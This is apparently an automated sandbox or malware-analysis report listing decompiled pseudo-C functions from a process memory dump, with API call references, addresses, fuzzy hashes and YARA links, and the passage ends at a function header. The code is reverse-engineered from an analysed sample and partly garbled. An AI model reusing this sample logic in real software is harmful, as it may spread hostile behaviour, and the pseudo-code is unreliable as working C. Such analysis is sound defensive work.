Instruction ID: 0a72a4b2e2d77052a51b2f2d5e236859d32c848f3088bb9e023d5b7a16a93d1d
Opcode Fuzzy Hash: 869fa0b64b6964ccf57280b375fa7bbf8410ec3ac7465fde3eb591de887824f5
Instruction Fuzzy Hash: 9AF0F8B0214641DBFB329F39E889F1A7BBCBB19759F088509F949D7249C638E804CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0137461D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0137461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x137a37c; // 0x79e9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x137a37c; // 0x79e9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x137a37c; // 0x79e9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x137b882) {
					HeapFree( *0x137a290, 0, _t10);
					_t7 =  *0x137a37c; // 0x79e9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x0137461d
0x01374626
0x01374636
0x01374636
0x0137463b
0x01374640
0x00000000
0x00000000
0x01374630
0x01374630
0x01374642
0x01374647
0x0137464b
0x0137465e
0x01374664
0x01374664
0x0137466d
0x0137466f
0x01374673
0x01374679

APIs

RtlEnterCriticalSection.NTDLL(079E95F0), ref: 01374626
Sleep.KERNEL32(0000000A,?,?,01372F44,?,?,?,?,?,013744F9,?,00000001), ref: 01374630
HeapFree.KERNEL32(00000000,?,?,?,01372F44,?,?,?,?,?,013744F9,?,00000001), ref: 0137465E
RtlLeaveCriticalSection.NTDLL(079E95F0), ref: 01374673

Strings

Ut, xrefs: 0137465E

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: df501aab724bf121633b4ef5525c9ee9e988ec3e7775e2619164ab08ba42ec29
Instruction ID: 869fd84a11215ab0c66a33dfd8d7ee02c36c9a91453c6ebac0c6de3c982ab361
Opcode Fuzzy Hash: df501aab724bf121633b4ef5525c9ee9e988ec3e7775e2619164ab08ba42ec29
Instruction Fuzzy Hash: C6F0FE78610200DFF739CF28E899F1977ACAB49729F094159E906D7358D774AC00CF15

Uniqueness

Uniqueness Score: -1.00%

Function 013735A1, Relevance: 7.7, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(01371B16,01376301,00000010,?,?,?,01371B16,00000001,01376301,00000000,?,01375B47,00000000,01376301,?,00000000), ref: 013735F2
memcpy.NTDLL(00000000,00000000,079E9630,00000010), ref: 01373685
GetLastError.KERNEL32(?,?,00000010), ref: 013736DD
GetLastError.KERNEL32 ref: 0137370F
GetLastError.KERNEL32 ref: 01373723
GetLastError.KERNEL32(?,?,?,01371B16,00000001,01376301,00000000,?,01375B47,00000000,01376301,?,00000000,01376301,00000000,079E9630), ref: 01373738

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$memcpy
String ID:
API String ID: 2760375183-0
Opcode ID: 71b60261484cf3dc580f6cdd8f8c082dd38b2d9d41c044c7285ea604cfa67011
Instruction ID: ba90f45190486f062d92bf3f38c902e76ecf4c87501874e2bcc71b5d5f441284
Opcode Fuzzy Hash: 71b60261484cf3dc580f6cdd8f8c082dd38b2d9d41c044c7285ea604cfa67011
Instruction Fuzzy Hash: DE514BB1900249BFEB319FA9DC84AAEBBB9FB48358F044429F905E7240D7349A149B61

Uniqueness

Uniqueness Score: -1.00%

Function 01372A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01372A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x137a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x137a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x137a2b0 = _t6;
				 *0x137a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x137a2ac = _t7;
				if(_t7 == 0) {
					 *0x137a2ac =  *0x137a2ac | 0xffffffff;
				}
				return 0;
			}

0x01372a20
0x01372a28
0x01372a2d
0x00000000
0x01372a7a
0x01372a2f
0x01372a37
0x01372a77
0x00000000
0x01372a77
0x01372a39
0x01372a3e
0x01372a50
0x01372a55
0x01372a5b
0x01372a63
0x01372a68
0x01372a6a
0x01372a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0137446F,?,?,00000001), ref: 01372A20
GetVersion.KERNEL32(?,00000001), ref: 01372A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 01372A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 01372A5B
GetLastError.KERNEL32(?,00000001), ref: 01372A7A

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 463922f60b06eb0e507fc8fd10e0d65dc508ec73a547bd5131375c394ac1f143
Instruction ID: 7d5abc32e99404d26a8bf8042fb0817b0b7abb32fe3e0dcd8e035e472a6cf52a
Opcode Fuzzy Hash: 463922f60b06eb0e507fc8fd10e0d65dc508ec73a547bd5131375c394ac1f143
Instruction Fuzzy Hash: D3F03A70695311AFE7729F75AC09B1A3AFCB708768F044629E646D62D8EB754000CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0137202E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0137202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x137a38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E013733FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E01374B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E01372A03(_a8);
						goto L29;
					}
					_t65 =  *0x137a2d0; // 0x666d5a8
					_t16 = _t65 + 0x137b908; // 0x65696c43
					_t68 = E013733FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d013790
						if(E01375C15(_t103,  *_t33, _t97, _a8,  *0x137a384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x137a2d0; // 0x666d5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x137ba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x137b927; // 0x55434b48
								_t73 = _t34;
							}
							if(E0137762C(_t73,  *0x137a384,  *0x137a388,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x137a2d0; // 0x666d5a8
									_t44 = _t75 + 0x137b893; // 0x74666f53
									_t78 = E013733FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d013790
										E013733B7( *_t47, _t97, _a8,  *0x137a388, _a24);
										_t49 = _t107 + 0x10; // 0x3d013790
										E013733B7( *_t49, _t97, _t105,  *0x137a380, _a16);
										E01372A03(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d013790
									E013733B7( *_t40, _t97, _a8,  *0x137a388, _a24);
									_t43 = _t107 + 0x10; // 0x3d013790
									E013733B7( *_t43, _t97, _a8,  *0x137a380, _a16);
								}
								if( *_t107 != 0) {
									E01372A03(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d013790
					if(E01375419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d013790
							E01375C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E01372A03(_t106);
						_t104 = _a16;
					}
					E01372A03(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E01377973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x137a38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x0137202e
0x01372037
0x0137203e
0x01372043
0x013720b0
0x013720b6
0x013720bb
0x013720c4
0x013720cb
0x013720ce
0x01372242
0x01372249
0x01372249
0x0137224e
0x01372250
0x01372250
0x01372259
0x01372259
0x013720d4
0x013720e0
0x01372238
0x0137223b
0x00000000
0x0137223b
0x013720e6
0x013720eb
0x013720f4
0x013720fb
0x013720fe
0x01372148
0x01372148
0x0137215b
0x01372165
0x0137216d
0x01372172
0x0137217c
0x0137217c
0x01372174
0x01372174
0x01372174
0x01372174
0x0137219e
0x013721a6
0x013721d4
0x013721d9
0x013721e2
0x013721e7
0x013721eb
0x0137221d
0x013721ed
0x013721fa
0x013721fd
0x0137220d
0x01372210
0x01372216
0x01372216
0x013721a8
0x013721b5
0x013721b8
0x013721ca
0x013721cd
0x013721cd
0x01372227
0x01372233
0x01372229
0x0137222c
0x0137222c
0x01372227
0x0137219e
0x00000000
0x01372165
0x0137210d
0x01372117
0x01372119
0x0137211e
0x01372122
0x01372124
0x0137212f
0x01372132
0x01372132
0x01372138
0x0137213d
0x0137213d
0x01372143
0x00000000
0x01372143
0x01372048
0x00000000
0x0137206f
0x0137206f
0x0137207b
0x0137208e
0x01372094
0x0137209c
0x00000000
0x0137209c

APIs

StrChrA.SHLWAPI(01377319,0000005F,00000000,00000000,00000104), ref: 01372061
lstrcpy.KERNEL32(?,?), ref: 0137208E

Part of subcall function 013733FA: lstrlen.KERNEL32(?,0137A380,74E47FC0,00000000,01372788,?,?,?,?,?,01373EAC,?), ref: 01373403
Part of subcall function 013733FA: mbstowcs.NTDLL ref: 0137342A
Part of subcall function 013733FA: memset.NTDLL ref: 0137343C

Part of subcall function 013733B7: lstrlenW.KERNEL32(01377319,?,?,01372202,3D013790,80000002,01377319,0137742D,74666F53,4D4C4B48,0137742D,?,3D013790,80000002,01377319,?), ref: 013733D7

Part of subcall function 01372A03: HeapFree.KERNEL32(00000000,00000000,01374072,00000000,?,?,00000000,?,?,?,?,?,?,013744AE,00000000), ref: 01372A0F

lstrcpy.KERNEL32(?,00000000), ref: 013720B0

Strings

\, xrefs: 01372094

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: 56e2276714e94af93b8c324f379c95000f266b7270d107087f1db9b919b80be7
Instruction ID: cfd2fb06bc33b0e092961ec671ff04c24d7fd6b80fddcefcceb5245affb7fa57
Opcode Fuzzy Hash: 56e2276714e94af93b8c324f379c95000f266b7270d107087f1db9b919b80be7
Instruction Fuzzy Hash: 8951377650020AAFEF729FA8DC44EAB7BBDFB18308F104514FA1597161DB39D915EB20

Uniqueness

Uniqueness Score: -1.00%

Function 0137243C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0137243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x137a2d0; // 0x666d5a8
				_t2 = _t22 + 0x137b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x137a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x137a2a4 =  *0x137a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E01373F12(_t49, _t48);
					_t33 = E013745E6(_t46, _t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x137a2a4 < 5) {
							 *0x137a2a4 =  *0x137a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E01372813();
					HeapFree( *0x137a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x137a390; // 0x79e8d6c
				if(RtlAllocateHeap( *0x137a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E01376DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
				goto L5;
			}

0x0137243c
0x01372443
0x0137244a
0x0137244e
0x01372453
0x0137245e
0x0137246e
0x013724b1
0x013724b5
0x013724b9
0x013724ba
0x013724bd
0x013724c2
0x013724c2
0x013724c5
0x013724c9
0x01372503
0x01372503
0x01372509
0x01372510
0x01372510
0x013724cb
0x013724ce
0x013724d0
0x013724dd
0x013724df
0x013724e6
0x0137251d
0x01372522
0x01372524
0x01372526
0x01372526
0x00000000
0x01372524
0x013724e8
0x013724ef
0x013724fd
0x00000000
0x013724fd
0x01372470
0x0137248b
0x013724a5
0x00000000
0x013724a5
0x0137249e
0x00000000

APIs

wsprintfA.USER32 ref: 0137245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01372483

Part of subcall function 01376DB7: GetTickCount.KERNEL32 ref: 01376DCE
Part of subcall function 01376DB7: wsprintfA.USER32 ref: 01376E1B
Part of subcall function 01376DB7: wsprintfA.USER32 ref: 01376E38
Part of subcall function 01376DB7: wsprintfA.USER32 ref: 01376E58
Part of subcall function 01376DB7: wsprintfA.USER32 ref: 01376E76
Part of subcall function 01376DB7: wsprintfA.USER32 ref: 01376E99
Part of subcall function 01376DB7: wsprintfA.USER32 ref: 01376EBA

HeapFree.KERNEL32(00000000,01371C1F,?,?,01371C1F,?), ref: 013724FD

Strings

Ut, xrefs: 013724FD

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID: Ut
API String ID: 2794511967-8415677
Opcode ID: d0523ada2235025aba23cbe7127744a242c37365a9551def228d9c3034f80821
Instruction ID: 3ed3add931bec3975bc91e4e8cbc6785bd32fd866ce43b0204ba654899a07718
Opcode Fuzzy Hash: d0523ada2235025aba23cbe7127744a242c37365a9551def228d9c3034f80821
Instruction Fuzzy Hash: EF314872500119EFCB31DF68D984A9F7BBCFB08368F144026F906AB245D778EA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01371671, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 013716B2
SysFreeString.OLEAUT32(00000000), ref: 01371795

Part of subcall function 013713B4: SysAllocString.OLEAUT32(013792D0), ref: 01371404

SafeArrayDestroy.OLEAUT32(?), ref: 013717E9
SysFreeString.OLEAUT32(?), ref: 013717F7

Part of subcall function 01375872: Sleep.KERNEL32(000001F4), ref: 013758BA

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: b7444ce13627c23dccf5cf629beaaf88285fb13e325e291fa7b4ceae0f4deabe
Instruction ID: f96f2a544c93552df51e6492fc85e7ecb8d611bce78589cdcb26fe728d16a451
Opcode Fuzzy Hash: b7444ce13627c23dccf5cf629beaaf88285fb13e325e291fa7b4ceae0f4deabe
Instruction Fuzzy Hash: 7C51333690014EEFDB21DFE8C8848AEF7B6FF88354B148828E645EB214D7359D45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01371E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01371E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E01375278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E01372399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01373C32(_t101,  &_v428, _a8, _t96 - _t81);
					E01373C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E01372399(_t101,  &E0137A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E01372399(_a16, _a4);
						E0137114C(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L01377F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L01377F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E01375381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E013745B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E01375936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0137A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x01371e94
0x01371ea0
0x01371ea6
0x01371eab
0x01371eaf
0x01372021
0x01372025
0x01372025
0x01371eb5
0x01371eb9
0x01371ebf
0x01371ec0
0x01371ecb
0x01371ed1
0x01371ed6
0x01371ed9
0x01371ef3
0x01371f02
0x01371f0e
0x01371f18
0x01371f1d
0x01371f1f
0x01371f22
0x01371fd9
0x01371fdf
0x01371ff0
0x01372003
0x01372019
0x00000000
0x0137201e
0x01371f2b
0x01371f32
0x01371f36
0x01371f3c
0x01371f3e
0x01371f40
0x01371f42
0x01371f44
0x01371f4e
0x01371f53
0x01371f55
0x01371f57
0x01371f58
0x01371f59
0x01371f5a
0x01371f61
0x01371f68
0x01371f6b
0x01371f6b
0x01371f38
0x01371f38
0x01371f38
0x01371f73
0x01371f7b
0x01371f87
0x01371f8c
0x01371f8c
0x01371f91
0x00000000
0x00000000
0x01371f93
0x01371f96
0x01371fa3
0x00000000
0x00000000
0x01371fa5
0x01371fa5
0x01371fb2
0x01371f8c
0x01371f91
0x00000000
0x00000000
0x00000000
0x01371f91
0x01371fbc
0x01371fbf
0x01371fc2
0x01371fc9
0x01371fc9
0x01371fd6
0x00000000
0x01371fd6
0x01371ec2
0x01371ec6
0x01371ec7
0x01371ec9
0x00000000
0x00000000
0x00000000
0x01371ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 01371F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01371F5A
memset.NTDLL ref: 01372003
memset.NTDLL ref: 01372019

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 2856754cae352796aa3c920d74f9e24e6d1ccfe0e492c5b1be87085433c0f39b
Instruction ID: ed4667fbbb5b5b3264421da3faad22761bb39826c752680766636911ad5e1946
Opcode Fuzzy Hash: 2856754cae352796aa3c920d74f9e24e6d1ccfe0e492c5b1be87085433c0f39b
Instruction Fuzzy Hash: 8341B432A0021AAFDB30DF6CDC40BDE77B9EF55318F004569F949A7280DB789E448B91

Uniqueness

Uniqueness Score: -1.00%

Function 0137467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0137467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0x137a148() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E01375C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x137a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E01372A03(_v20);
							if(_v8 == 0) {
								_v8 = E01376589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x01374684
0x01374687
0x01374690
0x01374693
0x01374696
0x0137469e
0x0137479c
0x013747a7
0x013747aa
0x013747b2
0x013747b9
0x013747b9
0x013747ac
0x013747af
0x013747af
0x00000000
0x013747af
0x013746a7
0x00000000
0x00000000
0x013746b0
0x013746b1
0x013746b3
0x013746bc
0x01374793
0x00000000
0x01374793
0x013746c8
0x013746cf
0x013746d2
0x01374781
0x01374788
0x01374788
0x0137478e
0x00000000
0x00000000
0x00000000
0x00000000
0x013746d8
0x013746d8
0x013746d8
0x013746d8
0x013746dd
0x013746df
0x013746df
0x013746ec
0x013746f4
0x00000000
0x00000000
0x013746f6
0x01374703
0x01374709
0x01374709
0x0137470c
0x00000000
0x00000000
0x01374719
0x0137472d
0x01374763
0x01374766
0x01374769
0x01374771
0x0137477c
0x0137477c
0x00000000
0x01374771
0x0137472f
0x01374736
0x0137473e
0x00000000
0x00000000
0x01374740
0x0137474b
0x0137474e
0x00000000
0x01374755
0x01374755
0x00000000
0x01374755
0x0137474e
0x01374716
0x00000000
0x01374758
0x01374758
0x00000000

APIs

GetLastError.KERNEL32 ref: 0137479C

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

GetLastError.KERNEL32 ref: 01374710
WaitForSingleObject.KERNEL32(00000000), ref: 01374720
GetLastError.KERNEL32 ref: 01374740

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: ddfa1c8b58a5576be772328de6d443dc0931fbfd8c1f873faa1176195c6d4932
Instruction ID: 3b479291a96d2d897a82b9d738ada42d76df317a818ee88dd2c203fcf722fa36
Opcode Fuzzy Hash: ddfa1c8b58a5576be772328de6d443dc0931fbfd8c1f873faa1176195c6d4932
Instruction Fuzzy Hash: B5411AB4901249EFDF31DFA8C988AAEFBB9FF05349F104569E511E7150D734AA40DB11

Uniqueness

Uniqueness Score: -1.00%

Function 0137344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

